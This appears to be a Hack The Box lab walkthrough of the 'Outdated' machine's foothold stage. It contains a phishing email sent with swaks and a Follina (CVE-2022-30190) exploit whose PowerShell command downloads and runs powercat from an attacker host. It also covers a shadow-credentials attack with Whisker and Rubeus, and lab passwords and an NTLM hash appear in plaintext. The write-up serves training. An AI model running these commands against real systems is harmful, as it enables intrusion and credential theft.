> For the complete documentation index, see [llms.txt](https://htb.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://htb.adot8.com/hack-the-box/windows-boxes/outdated/foothold.md). # Foothold Test email ```bash adot@pwndot:~/htb/outdated$ swaks --server mail.outdated.htb --to itsupport@outdated.htb --from anton@adot8.com --header 'Subject: Internal Web App' --body "http://10.10.14.18" === Trying mail.outdated.htb:25... === Connected to mail.outdated.htb. <- 220 mail.outdated.htb ESMTP -> EHLO pwndot <- 250-mail.outdated.htb <- 250-SIZE 20480000 <- 250-AUTH LOGIN <- 250 HELP -> MAIL FROM: <- 250 OK -> RCPT TO: <- 250 OK -> DATA <- 354 OK, send. -> Date: Thu, 27 Feb 2025 07:11:58 -0600 -> To: itsupport@outdated.htb -> From: anton@adot8.com -> Subject: Internal Web App -> Message-Id: <20250227071158.449184@pwndot> -> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/ -> -> http://10.10.14.18 -> -> -> . <- 250 Queued (10.890 seconds) -> QUIT <- 221 goodbye === Connection closed with remote host. ``` ```bash adot@pwndot:~/htb/outdated$ updog -p 80 [+] Serving /home/adot/htb/outdated... WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead. * Running on all addresses (0.0.0.0) * Running on http://127.0.0.1:80 * Running on http://192.168.2.228:80 Press CTRL+C to quit 10.10.11.175 - - [27/Feb/2025 07:12:15] "GET / HTTP/1.1" 200 - ``` We can leverage MS-MSDT "Follina" (CVE-2022-30190)

{% embed url="" %} ```bash adot@pwndot:~/htb/outdated/follina.py$ python follina.py -m command -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.18/powercat.ps1')" -t rtf -u 10.10.14.18 Generated 'clickme.rtf' in current directory Generated 'exploit.html' in 'www' directory Serving payload on http://10.10.14.18:80/exploit.html ``` ```bash adot@pwndot:~/htb/outdated$ swaks --server mail.outdated.htb --to itsupport@outdated.htb --from anton@adot8.com --header 'Subject: Internal Web App' --body "http://10.10.14.18/exploit.html" === Trying mail.outdated.htb:25... === Connected to mail.outdated.htb. <- 220 mail.outdated.htb ESMTP ```

``` btables:GHKKb7GEHcccdCT8tQV2QwL3 ``` ```powershell PS C:\Users\btables> whoami /groups whoami /groups GROUP INFORMATION ----------------- Group Name Type SID Attributes ========================================== ================ ============================================ ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group OUTDATED\ITStaff Group S-1-5-21-4089647348-67660539-4016542185-1107 Mandatory group, Enabled by default, Enabled group Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group Mandatory Label\Medium Mandatory Level Label S-1-16-8192 ``` ```powershell PS C:\Users\btables> .\SharpHound.exe -c all .\SharpHound.exe -c all 2025-02-27T21:42:44.6514857-08:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound 2025-02-27T21:42:44.8858990-08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote ```

{% embed url="" %} Compile, upload and run ``` PS C:\Users\btables> iwr 10.10.14.18/Whisker.exe -o whisker.exe iwr 10.10.14.18/Whisker.exe -o whisker.exe PS C:\Users\btables> .\Whisker.exe add /target:sflowers .\Whisker.exe add /target:sflowers [*] No path was provided. The certificate will be printed as a Base64 blob [*] No pass was provided. The certificate will be stored with the password NzycSJ15jTkcosRW [*] Searching for the target account [*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb [*] Generating certificate [*] Certificate generated [*] Generating KeyCredential [*] KeyCredential generated with DeviceID 8b9c4eac-1869-4bdb-aae5-9a660ffde5e2 [*] Updating the msDS-KeyCredentialLink attribute of the target object [+] Updated the msDS-KeyCredentialLink attribute of the target object [*] You can now run Rubeus with the following syntax: Rubeus.exe asktgt /user:sflowers /certificate:MIIJuAIBAzCCCXQGCSqGSIb3DQEHAaCCCWUEgglhMIIJXTCCBhYGCSqGSIb3DQEHAaCCBgcEggYDMIIF/zCCBfsGCyqGSIb3DQEMCgECoIIE/jCCBPowHAYKKoZIhvcNAQwBAzAOBAgziU8dnanmDAICB9AEggTY964E2gQSqUroHWujS01PzoWQg8NrVT08mQX67uM0Eo478GinAjJRKDJSvs4LnUC38lID1W1Y2ihK9bt/9vKomiEaHPS8ZcCk2yRm0gAQ19tqW4okyOn9ot+xOgPLY99LHZOBFB5bvHwhYt+V2AUO8939tPh8J0eaphKuqcQJH8lOiXKEWsXRmJUYmQ2078OtrWh1zyXwYoJ255+vHUU30of6rULLpNlGpd87P/mMAg/wRs875noyxcsKj7qbmyvDKq7gNq/sIHA/J+fGvmtUuuILJAll799WzFJhHxoV+9qxeEWtL0zo//BghUJx1CZ5eXHu22yYcHDeNWDIbFgbaxbXpwzqIV6jXfKKj7eiEI9ok+GHZr9BArG9B9089KpNG+R1/w21/17VbxjuvpBOxcZF9NR+nMsOiaqpKgPjalnV0mVbpJPQIS1uhYjWYzaNoxBpB3LjheossCco+uZrJewniSA0UHGRgCO9ND7Ww6KvrVDlsLzGaI2DgFhByKw4k/j7OZdsIP ``` ``` Rubeus.exe asktgt /user:sflowers /certificate:MIIJuAIBAzC.../password:"NzycSJ15jTkcosRW" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show ```

``` sflowers:1FCDB1F6015DCB318CC77BB2BDA14DB5 ```

--- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://htb.adot8.com/hack-the-box/windows-boxes/outdated/foothold.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.